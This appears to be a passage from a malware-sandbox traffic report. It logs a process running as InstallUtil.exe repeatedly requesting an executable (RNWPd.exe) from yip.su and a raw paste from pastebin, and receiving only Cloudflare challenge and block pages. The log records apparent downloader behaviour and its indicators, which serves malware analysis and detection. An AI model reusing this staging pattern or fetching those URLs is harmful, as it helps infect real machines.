2024-08-11 09:22:02 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-08-11 09:22:02 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Sun, 11 Aug 2024 09:22:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-08-11 09:22:02 UTC	683	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 46 66 52 58 2f 62 43 61 57 34 78 59 77 6d 6c 37 65 6c 45 76 62 7a 47 5a 73 41 30 45 6a 4c 48 79 73 4b 67 47 4e 31 57 59 30 72 34 62 72 64 4b 6d 4f 4f 32 50 6b 5a 48 4e 57 55 4c 7a 49 50 50 55 70 6b 4c 51 5a 50 4a 68 6a 54 57 65 56 44 59 72 4e 34 46 50 66 30 58 38 49 45 4a 44 41 5a 47 4c 62 32 73 57 55 72 69 79 50 70 34 3d 24 6a 71 4c 45 36 68 65 44 78 49 7a 57 75 35 72 2b 58 43 4d 78 50 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: FfRX/bCaW4xYwml7elEvbzGZsA0EjLHysKgGN1WY0r4brdKmOO2PkZHNWULzIPPUpkLQZPJhjTWeVDYrN4FPf0X8IEJDAZGLb2sWUriyPp4=$jqLE6heDxIzWu5r+XCMxPg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-08-11 09:22:02 UTC	1369	IN	Data Raw: 33 62 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 3bfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-08-11 09:22:02 UTC	1369	IN	Data Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
2024-08-11 09:22:02 UTC	1369	IN	Data Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
2024-08-11 09:22:02 UTC	1369	IN	Data Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
2024-08-11 09:22:02 UTC	1369	IN	Data Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72 Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
2024-08-11 09:22:02 UTC	1369	IN	Data Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
2024-08-11 09:22:02 UTC	1369	IN	Data Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69 Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
2024-08-11 09:22:02 UTC	1369	IN	Data Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 38 36 35 36 33 27 2c 63 52 61 79 3a 20 27 38 62 31 37 32 38 61 65 39 38 39 35 30 66 34 36 27 2c 63 48 61 73 68 3a 20 27 61 38 66 32 34 30 35 62 62 65 63 37 38 33 64 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 45 71 4c 7a 56 78 70 4d 48 77 48 30 4c 30 59 4d 46 5a 47 5f 52 30 4e 32 4a 55 63 70 45 59 38 75 36 33 6c 72 4f 57 47 46 71 35 59 2d 31 37 32 33 33 36 38 31 32 32 2d 30 2e 30 2e 31 2e 31 2d 33 36 32 35 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '86563',cRay: '8b1728ae98950f46',cHash: 'a8f2405bbec783d',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=EqLzVxpMHwH0L0YMFZG_R0N2JUcpEY8u63lrOWGFq5Y-1723368122-0.0.1.1-3625",cFPWv: 'g',cTTim
2024-08-11 09:22:02 UTC	1369	IN	Data Raw: 41 56 63 5a 72 30 44 4e 41 61 47 77 2e 56 4a 67 67 6d 6a 75 2e 6a 59 6f 45 4f 66 4c 49 32 57 6c 37 75 46 78 39 4d 4a 45 70 55 4f 76 72 34 45 4f 61 4e 72 2e 62 31 6f 5f 53 71 64 63 37 54 6d 7a 74 71 63 63 51 39 4b 6d 6b 45 6f 6f 33 72 67 57 56 47 32 42 44 32 59 62 53 53 59 73 6a 53 78 79 30 52 4d 30 5a 34 50 4c 44 4b 76 58 55 6f 6c 62 79 54 5a 37 4b 31 4c 6b 34 6c 6c 4c 71 65 4e 6b 38 44 6b 44 50 30 50 61 46 6d 70 68 68 55 77 59 72 55 72 65 6d 43 6f 6b 76 79 57 54 51 57 73 73 33 73 35 62 55 38 4b 4f 4b 66 6b 74 4e 6a 59 6b 48 5a 33 5f 67 6f 39 74 65 4e 72 36 52 33 70 41 6a 66 63 43 78 39 6e 51 64 76 69 65 39 43 31 2e 58 30 70 42 5f 30 64 77 2e 6d 39 4b 33 53 52 62 69 47 69 79 4b 39 74 31 42 62 52 67 67 4f 4b 30 43 47 45 35 37 72 33 65 58 55 78 4e 78 76 48 Data Ascii: AVcZr0DNAaGw.VJggmju.jYoEOfLI2Wl7uFx9MJEpUOvr4EOaNr.b1o_Sqdc7TmztqccQ9KmkEoo3rgWVG2BD2YbSSYsjSxy0RM0Z4PLDKvXUolbyTZ7K1Lk4llLqeNk8DkDP0PaFmphhUwYrUremCokvyWTQWss3s5bU8KOKfktNjYkHZ3_go9teNr6R3pAjfcCx9nQdvie9C1.X0pB_0dw.m9K3SRbiGiyK9t1BbRggOK0CGE57r3eXUxNxvH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49719	172.67.19.24	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:07 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-08-11 09:22:07 UTC	222	IN	HTTP/1.1 200 OK Date: Sun, 11 Aug 2024 09:22:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8b1728ce9ed27c9c-EWR
2024-08-11 09:22:07 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-11 09:22:07 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-08-11 09:22:07 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-08-11 09:22:07 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-08-11 09:22:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49720	188.114.97.3	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:08 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-08-11 09:22:09 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Sun, 11 Aug 2024 09:22:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-08-11 09:22:09 UTC	681	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 5a 42 6c 64 52 33 48 39 57 59 73 57 64 6d 7a 62 75 47 73 6b 36 78 66 41 4b 47 2b 73 6a 46 45 6e 6a 59 78 76 6a 4f 35 31 51 70 33 57 78 53 4a 58 45 47 64 59 36 71 46 54 35 30 78 76 79 36 53 5a 72 62 2b 66 50 4b 53 49 62 66 70 6b 74 4d 64 36 71 6a 4d 71 52 4b 78 4d 39 50 64 34 6a 4a 67 36 69 6c 71 57 48 31 38 49 58 6d 6f 3d 24 33 4e 57 67 4e 46 66 6b 34 56 33 30 72 6e 65 6d 45 72 68 56 4d 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: ZBldR3H9WYsWdmzbuGsk6xfAKG+sjFEnjYxvjO51Qp3WxSJXEGdY6qFT50xvy6SZrb+fPKSIbfpktMd6qjMqRKxM9Pd4jJg6ilqWH18IXmo=$3NWgNFfk4V30rnemErhVMA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-08-11 09:22:09 UTC	1369	IN	Data Raw: 33 62 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 3bfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
